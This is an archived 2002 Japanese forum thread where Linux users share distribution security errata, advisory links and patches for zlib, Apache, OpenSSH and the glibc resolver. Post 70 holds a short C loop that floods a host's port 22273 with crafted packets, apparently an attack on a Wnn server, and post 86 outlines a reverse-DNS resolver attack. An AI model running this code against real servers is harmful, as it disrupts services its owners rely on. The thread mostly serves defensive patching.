2ちゃんねる スマホ用 ■掲示板に戻る■ 全部 1- 最新50    

■ このスレッドは過去ログ倉庫に格納されています

皆様、セキュリティホールは埋めとけよ

1 :login:Penguin:02/02/02 13:55 ID:TzxKF1DS.net
日々発見されるセキュリティホール。
その情報を一人であつめるのは大変です。情報の共有をしましょう。
先人達が埋めてくれた穴は、ありがたく反映させていただきましょう。

http://www.redhat.co.jp/support/errata/rh72-errata-security.html
http://www.turbolinux.co.jp/security/
http://www.vinelinux.org/errata/2x/i386.html
http://www.debian.org/security/

ML等からの情報もよろしく

2 :login:Penguin:02/02/02 14:23 ID:vcmtljfb.net
2ゲトー(・∀・)

3 :login:Penguin:02/02/02 15:35 ID:WnmUFKAf.net
こうやって並べてみると、Debianが一番対応早いな。
2,3日遅れでRedHat、ついでTurboか。
Vineのatとrsyncの対応はどうなってるんだ?

4 :login:Penguin:02/02/02 16:45 ID:ZpBt8Xu4.net
>>3
うち、Debianじゃないんだけど
apt-get upgrade
をcronさせとけば勝手に埋まりそうで良いなぁ〜
でも、これって「隣の花は赤い」みたいなものかなぁ・・・


5 :login:Penguin:02/02/02 16:51 ID:pTTak0WL.net
自動実行すると、設定ファイルがデフォルトに戻ってしまってそれがかえって
穴になってしまうってことは無いのかな?


6 :login:Penguin:02/02/02 17:24 ID:iy9HS+C9.net
>>5
DebianだとConffileはどうするか決められるでしょ

7 :login:Penguin:02/02/03 00:45 ID:kKB0w3Ro.net
>>6
 やはり Debian 強いね。

 そういうおれは、手動アップの 厨房な夜

8 :login:Penguin:02/02/04 17:21 ID:wJQG6Z6M.net
cron で upgrade すると対話的な質問のところで止まるという罠。


9 :login:Penguin:02/02/06 09:06 ID:wzRHhwGZ.net
2/5 Vine-errata

version-up
at-3.1.8-23vl0.1.i386.rpm

security-hole
uucp-1.06.1-31vl0.i386.rpm
rsync-2.4.1-2vl1.i386.rpm


10 :login:Penguin:02/02/06 09:37 ID:z1OnXuT2.net
Turbolinux
2002-02-01 mozilla 任意のホストのクッキーが不正に取得されてしまう

11 :login:Penguin:02/02/06 13:22 ID:aFEtGAeu.net
関連スレッド
http://pc.2ch.net/test/read.cgi/unix/995966668/

12 :login:Penguin:02/02/06 16:18 ID:CGfU8woV.net
彼女のセキュリティーホールを守るにはどうしたらいいですか?

13 :login:Penguin:02/02/06 16:35 ID:WFWamG0l.net
>>12貞操帯

14 :login:Penguin:02/02/06 16:56 ID:IgP4o0CH.net
>>13 予防的手段だけに頼ってはいけない。
インテグリティーチェックと定期的なログ監査。事後対策も忘れずに!

15 :login:Penguin:02/02/06 17:36 ID:suxHB5vN.net
>>12
常時自分がログインしておくというのは?


16 :login:Penguin:02/02/06 17:50 ID:YEmPbmK+.net
>>12
電源切っとけ。

17 :login:Penguin:02/02/06 19:28 ID:25EU2pWE.net

 パッチうぉ   あてよう

18 :login:Penguin:02/02/18 21:43 ID:7km2bSU3.net
SNMPセキュリティーホールage。
つーか、使ってる人いるのか?
使わんのだったら、パケジ消しとけ。
http://www.debian.org/
http://www.turbolinux.co.jp/security/


19 :login:Penguin:02/02/18 22:09 ID:Y/OOH446.net
at, uucp, ucd-sntpなんて個人でLinuxやってる場合は要らんとおもう

20 :rrdtool:02/02/18 22:38 ID:e0R/XIhl.net
net-snmp 4.2.3をtar玉から入れてる人は
snmpnetstatのfixパッチも当てたほうがエエぞ
fixパッチはredhatのSRPMから頂くとよろし

21 :login:Penguin:02/02/18 23:03 ID:xV7FaOh2.net
uucp、ucd-snmpはともかく、atは...まぁ、無くてもこまらんか。

ともかく、RPM系のディストリビューションで、「全部」とかで
インストールしてると、入ってる可能性大だから、用チェック
かとおもうですはい。


22 :login:Penguin:02/03/03 03:46 ID:631jyWWL.net
ipchainsの設定をしてみました。この設定はどうでしょうか?

# ipchains -nL
Chain input (policy ACCEPT):
target prot opt source destination ports
fw all ------ 0.0.0.0/0 0.0.0.0/0 n/a
Chain forward (policy DENY):
target prot opt source destination ports
MASQ all ------ 192.168.1.0/24 0.0.0.0/0 n/a
Chain output (policy ACCEPT):
Chain fw (1 references):
target prot opt source destination ports
ACCEPT tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 25
ACCEPT tcp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023
ACCEPT udp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023
DENY tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023
DENY udp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023


23 :login:Penguin:02/03/03 12:16 ID:SZmEd9Su.net
>>22
スレ違い。質問スレでやっとけ。

24 :login:Penguin:02/03/03 12:18 ID:SZmEd9Su.net
http://www.turbolinux.co.jp/security/php-4.1.2-1.html
PHPボロボロだな

25 :login:Penguin:02/03/07 15:55 ID:cquF55ex.net
3/6 Vine-errata

security hole
squid-2.3.STABLE5-0vl2.i386.rpm


26 :zlib!:02/03/12 16:41 ID:UaXqoxZ1.net
zlib祭りだYO!
http://www.linuxsecurity.com/articles/security_sources_article-4582.html
http://www.kb.cert.org/vuls/id/368819

27 :login:Penguin:02/03/12 21:43 ID:lpFBAfJZ.net
http://www.zdnet.co.jp/news/0203/12/e_linux.html

28 :login:Penguin:02/03/12 21:57 ID:e6hdJtN/.net
zlib祭り会場はどこですか?

29 :login:Penguin:02/03/12 23:21 ID:11TI6bf4.net
>>28
あなたのおうちの犬箱です

30 :login:Penguin:02/03/12 23:25 ID:tWqbf2NQ.net
ftp.mozilla.orgが繋がらないのはzlib祭りのお陰ですか?

31 :sage:02/03/13 00:41 ID:mlfLGoSb.net
http://www.kb.cert.org/vuls/id/368819
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0059
http://www.gzip.org/zlib/advisory-2002-03-11.txt
http://slashdot.jp/article.pl?sid=02/03/12/1325239&mode=nested
http://www.ipa.go.jp/security/news/news.html
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020312_zlib



32 :login:Penguin:02/03/13 02:02 ID:Rw4EvJaU.net
3/12 Vine-errata

security hole
openssh-2.9.9p2-0vl0.3.i386.rpm
openssh-clients-2.9.9p2-0vl0.3.i386.rpm
openssh-server-2.9.9p2-0vl0.3.i386.rpm
openssh-askpass-2.9.9p2-0vl0.3.i386.rpm

33 :login:Penguin:02/03/13 08:10 ID:P2nMMkSR.net
げー、zlibやばいなぁ。ローカルからの攻撃には無力っぽいね。
ブラウザ経由の攻撃もできるのかなぁ...
(不正なPNG送るとかで)

34 :名無しさん@お腹いっぱい。:02/03/13 09:00 ID:X9FAJrTn.net
mod_gzipとかやばそうだね

35 :名無しさん@Emacs:02/03/13 10:03 ID:uVnzr98W.net
>>33
まぁ何はなくともさっさとzlibを更新(-> 1.1.4)することだね。
pngやgzipを直接解釈するようなサーバでもない限り外部からの攻撃は受けない
だろうし、apacheをrootで動かしてるような豪快な奴も居ない(と信じたい)
だろうから、あまり大きな問題にはならないだろうけど。



36 :zlib!:02/03/13 11:47 ID:zAIB51rk.net
bugtraqに出てたH D Moore氏のpngの画像を
XEmacsでプレビューしたらXEmacsが落ちたYO!


37 :zlib!:02/03/13 11:54 ID:zAIB51rk.net
>>36
サンプル画像はここにもあるYO!
http://www.digitaloffense.net/openssh_zlib/

38 :login:Penguin:02/03/13 19:47 ID:dfFI4Er/.net
>>36
他力本願で申し訳ないが、coreとか調べてみました?
結局どーなってどーなっちゃうのかよくわからんもので・・・。
stackoverflowと同様だと思ってればいいのかな〜

39 :login:Penguin:02/03/13 23:37 ID:7LNGAJrc.net
apache って root で動かすとやばいの?

40 :login:Penguin:02/03/14 00:38 ID:6jzSzsuH.net
>>39
そりゃやばいだろ (;´Д`)


41 :zlib!:02/03/14 11:03 ID:Ok5u5E1d.net
>>38
XEmacs(bamboo)はsignal 11で落ちたみたい
coreはあるけどgdb扱える能力無いのよ。すまん
で、zlib最新にしてlibpngリコンパイルしたら落ちなくなったYO!


42 :login:Penguin:02/03/16 19:05 ID:49Bp+Ljr.net
Debian セキュリティ HOWTO
http://www.jp.debian.org/doc/manuals/securing-debian-howto/

43 :login:Penguin:02/03/21 09:18 ID:l6UXxXqO.net
3/21 Vine-errata

security hole

zlib-1.1.3-25vl0.i386.rpm
zlib-devel-1.1.3-25vl0.i386.rpm

cvs-1.11.1p1-7vl0.i386.rpm
dump-0.4b19-5.6x.1.i386.rpm
dump-static-0.4b19-5.6x.1.i386.rpm
kernel-2.2.19-0vl0.24.i386.rpm
kernel-2.2.19-0vl0.24.i586.rpm
kernel-2.2.19-0vl0.24.i686.rpm
kernel-BOOT-2.2.19-0vl0.24.i386.rpm
kernel-doc-2.2.19-0vl0.24.i386.rpm
kernel-headers-2.2.19-0vl0.24.i386.rpm
kernel-ibcs-2.2.19-0vl0.24.i386.rpm
kernel-pcmcia-cs-2.2.19-0vl0.24.i386.rpm
kernel-smp-2.2.19-0vl0.24.i386.rpm
kernel-smp-2.2.19-0vl0.24.i586.rpm
kernel-smp-2.2.19-0vl0.24.i686.rpm
kernel-source-2.2.19-0vl0.24.i386.rpm
kernel-utils-2.2.19-0vl0.24.i386.rpm
rmt-0.4b19-5.6x.1.i386.rpm
rpm-3.0.6-0vl2.1.i386.rpm
rpm-build-3.0.6-0vl2.1.i386.rpm
rpm-devel-3.0.6-0vl2.1.i386.rpm
rpm-python-3.0.6-0vl2.1.i386.rpm
popt-1.5.1-0vl2.1.i386.rpm
rsync-2.4.1-2vl2.i386.rpm
sash-3.4-2vl0.i386.rpm
info-4.0-5vl0.i386.rpm
texinfo-4.0-5vl0.i386.rpm


44 :login:Penguin:02/03/21 09:18 ID:l6UXxXqO.net
3/21 Vine-errata

security hole

apache-1.3.23-0vl0.1.i386.rpm
apache-devel-1.3.23-0vl0.1.i386.rpm
apache-manual-1.3.23-0vl0.1.i386.rpm
mod_ssl-2.8.7-0vl0.1.i386.rpm

fileutils-4.0x-1vl4.i386.rpm

45 :login:Penguin:02/04/05 12:26 ID:ikMkS74J.net
04/04 Vine-errata security hole

XFree86-3.3.6-13vl28.1.i386.rpm
XFree86-100dpi-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-75dpi-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-3DLabs-3.3.6-13vl28.1.i386.rpm
XFree86-8514-3.3.6-13vl28.1.i386.rpm
XFree86-AGX-3.3.6-13vl28.1.i386.rpm
XFree86-FBDev-3.3.6-13vl28.1.i386.rpm
XFree86-I128-3.3.6-13vl28.1.i386.rpm
XFree86-Mach32-3.3.6-13vl28.1.i386.rpm
XFree86-Mach64-3.3.6-13vl28.1.i386.rpm
XFree86-Mach8-3.3.6-13vl28.1.i386.rpm
XFree86-Mono-3.3.6-13vl28.1.i386.rpm
XFree86-P9000-3.3.6-13vl28.1.i386.rpm
XFree86-S3-3.3.6-13vl28.1.i386.rpm
XFree86-S3V-3.3.6-13vl28.1.i386.rpm
XFree86-SVGA-3.3.6-13vl28.1.i386.rpm
XFree86-VGA16-3.3.6-13vl28.1.i386.rpm
XFree86-W32-3.3.6-13vl28.1.i386.rpm
XFree86-XF86Setup-3.3.6-13vl28.1.i386.rpm
XFree86-Xnest-3.3.6-13vl28.1.i386.rpm
XFree86-Xvfb-3.3.6-13vl28.1.i386.rpm
XFree86-cyrillic-fonts-3.3.6-13vl28.1.i386.rpm
XFree86-devel-3.3.6-13vl28.1.i386.rpm
XFree86-doc-3.3.6-13vl28.1.i386.rpm
XFree86-libs-3.3.6-13vl28.1.i386.rpm
XFree86-xfs-3.3.6-13vl28.1.i386.rpm

46 :login:Penguin:02/04/11 21:08 ID:n5epu8MN.net
04/11 Vine-errata

security hole
squid-2.3.STABLE5-0vl4.i386.rpm

47 :名無しさん:02/04/12 15:15 ID:357cbhyA.net
ぼくの肛門も埋めてください

48 :login:Penguin:02/05/14 10:29 ID:nCRPXE+h.net
05/14 Vine-errata security hole

sudo-1.6.3p6-0.6vl3.i386.rpm

49 :login:Penguin:02/05/28 18:43 ID:nc9YjYw6.net
apt-get update
apt-get upgrade

だけでは不十分ですか?

50 :login:Penguin:02/05/28 18:43 ID:nc9YjYw6.net
age忘れ。

51 :login:Penguin:02/06/03 00:38 ID:ecxsuEIo.net
僕のチンポの先も埋めてください

52 :login:Penguin:02/06/03 00:54 ID:Yo9snOlP.net
>apt-get update
>apt-get upgrade
>
>だけでは不十分ですか?

ヴァカじゃん。そういう姿勢がそもそもsecurity hole

53 :login:Penguin:02/06/06 13:09 ID:H4e/6DmJ.net
06/06 Vine-errata security hole

fetchmail-5.9.11-0vl1.i386.rpm

imap-2001a-10vl1.i386.rpm
imap-devel-2001a-10vl1.i386.rpm

bzip2-1.0.1-3vl3.i386.rpm
bzip2-devel-1.0.1-3vl3.i386.rpm


54 :login:Penguin:02/06/13 09:25 ID:+8hN98ol.net
06/13 Vine-errata security hole

tcpdump-3.6.2-13vl1.i386.rpm
libpcap-0.6.2-13vl1.i386.rpm
arpwatch-2.1a11-13vl1.i386.rpm


55 :login:Penguin:02/06/18 15:41 ID:Y4ljwPvb.net
Apacheにセキュリティホール
http://slashdot.jp/article.pl?sid=02/06/18/0434227

UNIX板 Apache関連 Part2
http://pc.2ch.net/test/read.cgi/unix/1017812420/466n-


56 :login:Penguin:02/06/19 08:45 ID:HipJ6wEK.net
バグフィクスされたapacheがリリースされたそうです。

http://www.apache.org/dist/httpd/Announcement.html
http://httpd.apache.org/info/security_bulletin_20020617.txt

57 :login:Penguin:02/06/19 23:43 ID:APWNucgQ.net
06/19 Vine-errata security hole

apache-1.3.26-0vl1.i386.rpm
apache-devel-1.3.26-0vl1.i386.rpm
apache-manual-1.3.26-0vl1.i386.rpm
mod_ssl-2.8.9-0vl1.i386.rpm

58 :login:Penguin:02/06/20 10:16 ID:01vvi0s8.net
>>55
Red Hat
http://rhn.redhat.com/errata/RHSA-2002-103.html

59 :login:Penguin:02/06/20 10:44 ID:gutuxgNU.net
Debian (potato)
DSA-131-1 apache -- remote DoS / exploit
http://www.debian.org/security/2002/dsa-131

DSA-132-1 apache-ssl -- remote DoS / exploit
http://www.debian.org/security/2002/dsa-132


60 :login:Penguin:02/06/20 13:37 ID:RkoCmceO.net
Apache のそれは 32bit Linux でもヤバそう。
某MLにexploitが流れてた。



61 :login:Penguin:02/06/20 13:56 ID:gutuxgNU.net
Apache Web サーバプログラムの脆弱性に関する注意喚起 http://www.jpcert.or.jp/at/2002/at020003.txt

62 :login:Penguin:02/06/20 14:06 ID:RkoCmceO.net
情報スカスカのJPCERT勧告なんぞ読んでも仕方無いぞ。ほい日本語版。
http://www.lac.co.jp/security/intelligence/CERT/CA-2002_17.html

63 :login:Penguin:02/06/20 14:24 ID:01vvi0s8.net
こっちはそれなりに有用。
http://www.ipa.go.jp/security/ciadr/20020619apache.html

64 :名無しさん:02/06/22 23:55 ID:STj3pUTJ.net
「くだ質」とどちらに投げようか迷った挙げ句、こちらに
投げることにしました。
以下のような自分の使用状況がセキュリティの面で安全か
どうか伺いたく存じます。
自宅でLinuxを使っています。Flets ADSLを契約しており、
常時接続ではなく、時々インターネットに接続して電子
メールを読み書きしたり、WWWで情報を得たりしています。
ルータ等は使っていません。他のホストにwwwやftpで
クライエントとして接続することはあっても、自ホストを
サーバにする必要は殆どないと考えています。ただ例外で、
smtpサーバとしてnullmailerを使っています。
Debian GNU/Linux sidを使っており、電源を入れる度に
apt-getでパッケージを更新しています。
ftpd、rsh-server、ssh、apache等は削除しています。
kernelは2.4.18です。
/etc/hosts.allowは何も記述せず、
/etc/hosts.denyはALL: ALLにしてます。
# netstat --tcp --all
は、
Proto 受信-Q 送信-Q 内部アドレス 外部アドレス 状態
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:32927 *:* LISTEN
tcp 0 0 xxx.yyy.zzz.uuu:33011 aaa.bbb.ccc.ddd:smtp TIME_WAIT
となります(xxx.yyy.zzz.uuuは割り当てられたIPアドレス、
aaa.bbb.ccc.dddはプロバイダのメールサーバのIPアドレス)。


65 :login:Penguin:02/06/23 00:03 ID:bXEc0h6E.net
>>64
> 以下のような自分の使用状況がセキュリティの面で安全か
> どうか伺いたく存じます。
「安全」と「安全でない」の2つしか状態がないと思ってる?

66 :login:Penguin:02/06/23 00:47 ID:knGXFfYf.net
Apache の脆弱性を攻撃するツールが登場
http://slashdot.jp/article.pl?sid=02/06/22/1240249&mode=thread

67 :login:Penguin:02/06/23 01:02 ID:kepzSriJ.net
>>66
充分に気をつけているほうだと思うよ。
でもセキュリティにこれで完璧ってのは無いんだよ。
あくまでコストとリスクとの綱引きでしかない。
しかしそれで侵入されたからって君を責める人はあまりいないだろう。

68 :login:Penguin:02/06/23 01:25 ID:xLORxFdI.net
>>66
inetdも止めてしまおう。

69 :login:Penguin:02/06/25 15:34 ID:drybiZ1b.net
OpenSSH に新たな弱点発見。詳細は来週まで秘密。
リモートから悪用可能らしい。
3.3 にも同じ弱点があるが、侵入は防げるそうだ。

70 :login:Penguin:02/06/25 22:33 ID:yPSMZ+Jm.net
void writei(int fd,int num){num = htonl(num);write(fd,&num,4);}
void writes(int fd,char *s){write(fd,s,strlen(s)+1);}
void main(int argc,char **argv){struct hostent *he;struct sockaddr_in si;int fd;
char a[10];he = gethostbyname(argv[1]);while(1){fd = socket(PF_INET,SOCK_STREAM,0);si.sin_family = AF_INET;memcpy(&si.sin_addr,he->h_addr_list[0],sizeof(si.sin_addr));
si.sin_port = htons(22273);connect(fd,(struct sockaddr *)&si,sizeof(si));sprintf(a,"%d",rand());writei(fd,0x66);writei(fd,0);
writes(fd,a);writei(fd,0);writei(fd,3);close(fd);}}

71 :login:Penguin:02/06/25 22:46 ID:LJSlbrtr.net
>>69
これだね。
Debian 以外のパッケージはいつころ出るんだろ。
http://www.koka-in.org/~haruyama/ssh_koka-in_org/0/4.html

72 :login:Penguin:02/06/26 09:06 ID:yIavaL89.net
>70
Wnnか?何の穴よ?
まさかwww.freewnn.orgにある大昔の穴じゃないだろうな。

73 :login:Penguin:02/06/26 20:58 ID:0uLnP27B.net
>>72
違うっぽい。

74 :login:Penguin:02/06/26 22:51 ID:knPs+H7Y.net
*BSD の libc の resolver に穴が見つかったようだけど、glibc は
どうなんだろう
http://www.pine.nl/advisories/pine-cert-20020601.html


75 :login:Penguin:02/06/27 00:16 ID:UFWmO8g6.net
ISS から OpenSSH のアドバイザリが出た。
Challenge and Response 認証にバグ。remote root exploit。
sshd_config に
ChallengeResponseAuthentication no
で回避可能。3.4 で修正されている。
これがもし Theo の言ってた穴と同じものなら、
OpenSSH 3.0 以降にのみ存在する穴じゃん。
いちはやくアップデート出した Debian potato は踊らされただけか。

76 :login:Penguin:02/06/27 00:18 ID:UFWmO8g6.net
OpenSSH Advisory
http://www.openssh.com/txt/preauth.adv

77 :login:Penguin:02/06/27 00:19 ID:UFWmO8g6.net
さみだれ式でごめん。ISS Advisory
http://www.openssh.com/txt/iss.adv

78 :login:Penguin:02/06/27 00:31 ID:UFWmO8g6.net
>>75
訂正。3.0 以降じゃなくて 2.9.9 以降に弱点がある模様。
Debian 2.2 (potato) は安全な 1.2 系からわざわざ弱点のある
3.3 に入れ換えさせられた恰好だよ。Theo のアホーーーーー。
フルディスクロージャってやっぱり大事なんだな。

79 :login:Penguin:02/06/27 01:53 ID:b3kvzA+X.net
06/27 Vine-errata security hole

openssh-3.3p1-0vl10.i386.rpm
openssh-server-3.3p1-0vl0.i386.rpm
openssh-clients-3.3p1-0vl0.i386.rpm
openssh-askpass-3.3p1-0vl0.i386.rpm
openssh-askpass-gnome-3.3p1-0vl0.i386.rpm


80 :login:Penguin:02/06/27 01:59 ID:b3kvzA+X.net
>>79 は 06/26 発行でした。スマソ

81 :login:Penguin:02/06/27 11:42 ID:/viQ/aAY.net
openssh 3.4p1出てるよage


82 :login:Penguin:02/06/27 11:52 ID:EftB/YmL.net
syslogdが大きい。

83 :login:Penguin:02/06/27 16:56 ID:QDJgHCs7.net
resolver のバグは対岸の火事ではない模様。

84 :login:Penguin:02/06/27 17:20 ID:/viQ/aAY.net
2ch鯖のApacheも入れ替えが始まってるね。 遅いぐらいだ。昨日の件もこれが絡んでたのだろうか。 しかし入れ替えたはいいがlinuxのlibcにも。。。。 なんてことになったら大火事だな。

85 :login:Penguin:02/06/27 18:16 ID:d3NH2M4p.net
>>84
まさに大火事のようで(藁
まあ、リモートからいじれる穴ではないだろうけど


86 :login:Penguin:02/06/27 18:57 ID:QDJgHCs7.net
>>85
resolver のバグはリモートからいじれる。
攻撃者は自由に設定出来るネームサーバを持っていればいい。
ある IP アドレスの逆引きホストネームに攻撃用コードを仕込む。
そしてその IP アドレスから攻撃対象のサーバに接続する。
攻撃対象のサーバが逆引きを行い、
返って来た巧妙に細工されたホスト名を正引きしたら、あぼーん。

87 :login:Penguin:02/06/27 20:05 ID:4+mBkHBL.net
glibcには*BSDよりも1箇所余計にチェックが入っているが、
これでは防げないのか?

88 :login:Penguin:02/06/27 20:31 ID:GRjz2eTH.net
OpenSSHを3.1→3.4にアップグレードしたら、sshdの起動時に
This platform does not support both privilege separation and compression
Compression disabled
こんなメッセージを吐くんだけど・・・何だろ?syslogには上がらないみたいだけど気になるかな。

ちなみにRedHat6.2(kerner2.2.19/glibc2.1.3-23/OpenSSL0.9.6d)

89 : :02/06/27 20:37 ID:oX2io58x.net
>>88
Compressionは切ろう。



90 :login:Penguin:02/06/27 20:41 ID:QDJgHCs7.net
>>87
実際テストしてみたが落せない。
俺がヘボなだけかもしれないから識者の意見を待とう。

91 :88:02/06/27 20:42 ID:GRjz2eTH.net
>>89
sshd_configのCompressをnoに指定したら出なくなったよ。
感謝。


92 :login:Penguin:02/06/27 21:00 ID:4+mBkHBL.net
>>90
FreeBSDをパッチを見るに、gethnamaddr.cはずでにFreeBSDの
パッチと同じ処理が入っている。getnetnamadr.cにはない。

93 :login:Penguin:02/06/27 21:00 ID:QDJgHCs7.net
>>90
識者の意見が間違ってた Aapche の時のような事もあるから
itojun 氏のパッチあててもいいかもしれない。
でも勇み足で必要でないアップデートを出して、わざわざ穴を
開けてしまったDebian potato の例もあるし、悩ましいところだな。

94 :login:Penguin:02/06/27 21:13 ID:QDJgHCs7.net
識者登場age。

95 :login:Penguin:02/06/27 21:32 ID:4+mBkHBL.net
直すべきは nss_dns/dns-network.c か。
古いの見てた。すまそ。

96 :login:Penguin:02/06/28 11:19 ID:CALm/HoI.net
新しいBINDが出た


97 :login:Penguin:02/06/28 13:40 ID:PahA8xFy.net
>>93
itojunさんのパッチってどこでgetできます?
glibcに当たるのかいな?

98 :login:Penguin:02/06/28 16:13 ID:DZqksx+C.net
>>97
FreeBSD や NetBSD の Advisory 嫁。
そのままでは当たらないだろうから手作業で当てれ。
ま、俺はめんどいから様子見。

99 :login:Penguin:02/06/28 20:57 ID:Yj/G45g0.net
つーか、おまえら誰もglibcのコード読んでないんとちゃうか?

100 :login:Penguin:02/06/28 21:47 ID:Yj/G45g0.net
--- glibc-2.2.5/resolv/nss_dns/dns-network.c.org 2001-07-06 13:55:39.000000000 +0900
+++ glibc-2.2.5/resolv/nss_dns/dns-network.c 2002-06-28 21:42:26.000000000 +0900
@@ -328,7 +328,9 @@
}
cp += n;
*alias_pointer++ = bp;
- bp += strlen (bp) + 1;
+ n = strlen(bp) + 1;
+ bp += n;
+ linebuflen -= n;
result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC;
++have_answer;
}
こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の
処理がすでに入っている。

101 :名無しさん@XEmacs:02/06/29 01:29 ID:cleVXGS3.net
>>100
> こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の
> 処理がすでに入っている。

name6.c のチャンクは? と思ったけど,'99 に直ってるすね.

ttp://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/resolv/nss_dns/dns-host.c.diff?r1=1.15&r2=1.16&cvsroot=glibc&f=h



102 :login:Penguin:02/06/29 04:06 ID:uLF75Z2Y.net
>>79 Vine-errata security hole

openssh-3.4p1-0vl2.i386.rpm
openssh-server-3.4p1-0vl2.i386.rpm
openssh-clients-3.4p1-0vl2.i386.rpm
openssh-askpass-3.4p1-0vl2.i386.rpm
openssh-askpass-gnome-3.4p1-0vl2.i386.rpm

103 :login:Penguin:02/07/02 09:30 ID:QAyrQPMn.net
>>100-101
通報しますた。


104 :login:Penguin:02/07/02 11:35 ID:qVWzSPns.net
http://www.sendmail.org/8.12.5.html
> 8.12.5/8.12.52002/06/25
> SECURITY: The DNS map can cause a buffer overflow if the user
> specifies a dns map using TXT records in the configuration
> file and a rogue DNS server is queried. None of the
> sendmail supplied configuration files use this option hence
> they are not vulnerable. Problem noted independently by
> Joost Pol of PINE Internet and Anton Rang of Sun Microsystems.
普通の設定では影響なし、なのかな?

105 :login:Penguin:02/07/02 11:44 ID:qVWzSPns.net
resolver 問題、CERT/CC によると
glibc はこれで fix されてるらしい。
http://www.kb.cert.org/vuls/id/AAMN-5BMSW2

しかし、こういうのって他のプロジェクトに還元されないもんなんだろうか。

106 :login:Penguin:02/07/02 12:47 ID:KLRYFYVU.net
上のパッチ、だれかUlrich Drepperに投げた?

107 :地獄狂 YahooBB219017000159.bbtec.net ◆7WP8X9hw :02/07/02 13:39 ID:hdi7nBII.net
よくわかんないんだけど、glibcのバグはどのバージョンにあるの?

108 :login:Penguin:02/07/04 02:52 ID:qk/rUU9i.net
>>57 07/02 Vine-errata security hole

apache-1.3.26-0vl2.i386.rpm
apache-devel-1.3.26-0vl2.i386.rpm
apache-manual-1.3.26-0vl2.i386.rpm
mod_ssl-2.8.9-0vl2.i386.rpm

109 :login:Penguin:02/07/04 13:55 ID:50T+DZdt.net
http://dammit.lt/apache-worm/
このApacheワームのソースってどこから出たものなのかな。
ワーム自体は蜜壷で捕まえたみたいだけど。

110 :login:Penguin:02/07/04 14:07 ID:nB1GJwB4.net
Squid Proxy Cache Security Update Advisory SQUID-2002:3
- Security advisory several issues in Squid-2.4.STABLE6 and earlier.
Squid-2.4.STABLE7 released to address these issues.

http://www.squid-cache.org/Advisories/SQUID-2002_3.txt

111 :login:Penguin:02/07/04 14:13 ID:WhJXedKe.net
>>109
投稿した人は「僕の inbox に入ってた」って言ってた。

112 :login:Penguin:02/07/07 01:03 ID:BITbiOEM.net
snortのalert(警告)をメールで携帯に送りたいんですが、
どのようにすれば良いのでしょうか。
confファイルにはそれらしき箇所が見つかりませんでした。

113 :login:Penguin:02/07/07 01:06 ID:puqWG/eL.net
>>112
snort 単体ではできない。
syslog と swatch 等を使うか、snort 用のツールを使う。

114 :112:02/07/07 02:22 ID:BITbiOEM.net
>>113
さんくすこ

115 :login:Penguin:02/07/08 00:56 ID:/S0ObH45.net
NetSNMPとMRTGでサーバを監視しようと思ってるんですが、
MRTGに関してはローカルホスト(NetSNMPが入ってるマシン)を対象に
監視を行っても良いのでしょうか。
なんか説明ページだと、ルータが監視の対象となってるみたいなんですが。
(ルータがSNMPに対応していないので…)


116 :login:Penguin:02/07/08 12:47 ID:X0vw/Q8k.net
>>115

問題なし


117 :login:Penguin:02/07/08 21:11 ID:u3KFO/Rs.net
07/08 Vine-errata security hole

squid-2.4.STABLE7-0vl1.i386.rpm


118 :login:Penguin:02/07/11 10:09 ID:5UzWVYho.net
ttp://lwn.net/Articles/4545/

This bug has been fixed for the gethostbyXXX class of functions
in GNU libc in 1999. Unfortunately, there is similar code in the
getnetbyXXX functions in recent glibc implementations, and
the code is enabled by default. However, these functions are
used by very few applications only, such as ifconfig and ifuser,
which makes exploits less likely.

やはり....


119 :login:Penguin:02/07/11 13:11 ID:yBUV78yy.net
http://www.kb.cert.org/vuls/id/AAMN-5BMSW2
更新されてる


120 :login:Penguin:02/07/17 15:50 ID:c18o8yEa.net
最近新しい穴が見つからないねぇ。
いいことなんだが、何かつまらんw

121 :login:Penguin:02/07/22 23:24 ID:/iXwHkpN.net
キタ━━━━━━(゚∀゚)━━━━━━ !!!
PHP 4.2.0/4.2.1 に任意コード実行可能なセキュリティホール。
また IA32 じゃ任意コード実行は出来ないなんて言ってるよ。
ホントカナー???

122 :login:Penguin:02/07/26 10:13 ID:GbcCcnsG.net
Updated glibc packages fix vulnerabilities in resolver

http://rhn.redhat.com/errata/RHSA-2002-139.html
> A buffer overflow vulnerability has been found in the way the glibc
> resolver handles the resolution of network names and addresses via DNS (as
> per Internet RFC 1011). Version 2.2.5 of glibc and earlier versions are
> affected. A system would be vulnerable to this issue if the
> "networks" database in /etc/nsswitch.conf includes the "dns" entry. By
> default, Red Hat Linux ships with "networks" set to "files" and
> is therefore not vulnerable to this issue. (CAN-2002-0684)
>
> A second, related, issue is a bug in the glibc-compat packages, which
> provide compatibility for applications compiled against glibc version
> 2.0.x. Applications compiled against this version (such as those
> distributed with early Red Hat Linux releases 5.0, 5.1, and 5.2) could also
> be vulnerable to this issue. (CAN-2002-0651)
>
> These errata packages for Red Hat Linux 7.1 and 7.2 on the Itanium
> architecture also include a fix for the strncpy implementation in some
> boundary cases.

123 :名無しさん@Emacs:02/07/26 12:55 ID:WWUr2yVC.net
>>120
良いことではないか。ないにこしたことはない。


124 :login:Penguin:02/07/29 12:39 ID:6tjxSffv.net
Jul 29 02:47:04 XXXXX sshd[14409]: warning: /etc/hosts.allow, line 6: can't verify hostname: gethostbyname(host180.cciglobal.net.pa) failed

これはresolverの穴を狙った攻撃?

125 :login:Penguin:02/07/29 16:57 ID:Nqm0H4Dg.net
接続元のIPアドレスからホスト名を調べて、そこからまたIPアドレスを
ひいたら元に戻らなかった、ってことだと思う。>>124のものも、
うちに来ているものも、DNSでAレコードがひけないんだよね。

